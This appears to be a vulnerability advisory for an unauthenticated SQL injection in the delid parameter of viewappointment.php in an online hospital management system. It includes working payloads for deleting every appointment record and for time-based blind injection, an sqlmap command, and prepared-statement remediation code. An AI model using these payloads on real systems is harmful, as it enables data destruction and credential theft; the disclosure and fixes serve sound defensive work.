# Vulnerability Summary: Online Hospital Management System SQL Injection Vulnerability ## Vulnerability Overview An unrestricted SQL injection vulnerability exists in the `viewappointment.php` file of the **Online Hospital Management System**. This vulnerability arises because the `delid` parameter is directly concatenated into a `DELETE` SQL query without any filtering, escaping, or parameterized query protection. * **Trigger Condition**: Can be triggered by any **unauthenticated** remote attacker. * **Exploitation Method**: Attackers do not need a login session; they only need to pass a maliciously crafted `delid` parameter via the URL. * **Consequences**: Malicious attackers can exploit this vulnerability to delete all appointment records, bypass authentication, or extract sensitive database information (including administrator credentials). ## Impact Scope Successful exploitation of this vulnerability allows attackers to: * Delete all appointment records without authentication. * Extract sensitive data from the database using blind SQL injection techniques. * Obtain administrator credentials by dumping the `tbl_login` table. * Compromise the entire application by gaining administrator privileges. ## Remediation 1. **Use Prepared Statements**: Avoid direct string concatenation by using parameterized queries. 2. **Add Authentication and Authorization Checks**: Verify user identity before performing any sensitive operations. 3. **Validate Resource Ownership**: Ensure users can only delete records they own. 4. **Change HTTP Method**: Sensitive state-changing operations should use POST requests instead of GET. ## POC Code and Exploitation Code ### 1. Basic Deletion Proof (Direct Parameter) Access the following URL to delete the appointment with ID 1: ```text http://[target]/Hospital/viewappointment.php?delid=1 ``` ### 2. Bulk Deletion via SQL Injection Access the following URL to delete all records in the `appointment` table: ```text http://[target]/Hospital/viewappointment.php?delid=1' OR '1'='1 ``` The resulting SQL statement is: ```sql DELETE FROM appointment WHERE appointmentid='1' OR '1'='1' ``` ### 3. Time-Based Blind SQL Injection Use the following payload to verify the vulnerability via time delay: ```text http://[target]/Hospital/viewappointment.php?delid=1' AND (SELECT SLEEP(5)) AND '1'='1 ``` ### 4. Automated Exploitation Using sqlmap ```bash sqlmap -u "http://[target]/Hospital/viewappointment.php?delid=1" --level 3 ``` ### Remediation Code Examples **1. Using Prepared Statements:** ```php if(isset($_GET['delid'])) { $stmt = $con->prepare("DELETE FROM appointment WHERE appointmentid = ?"); $stmt->bind_param("i", $_GET['delid']); $stmt->execute(); } ``` **2. Adding Authentication and Authorization Checks:** ```php if(!isset($_SESSION['patientid']) && !isset($_SESSION['adminid'])) { header('Location: login.php'); exit; } ``` **3. Validating Resource Ownership:** ```php $stmt = $con->prepare("SELECT patientid FROM appointment WHERE appointmentid = ?"); $stmt->bind_param("i", $_GET['delid']); $stmt->execute(); $result = $stmt->get_result()->fetch_assoc(); if($result['patientid'] != $_SESSION['patientid'] && !isset($_SESSION['adminid'])) { die("Unauthorized"); } ```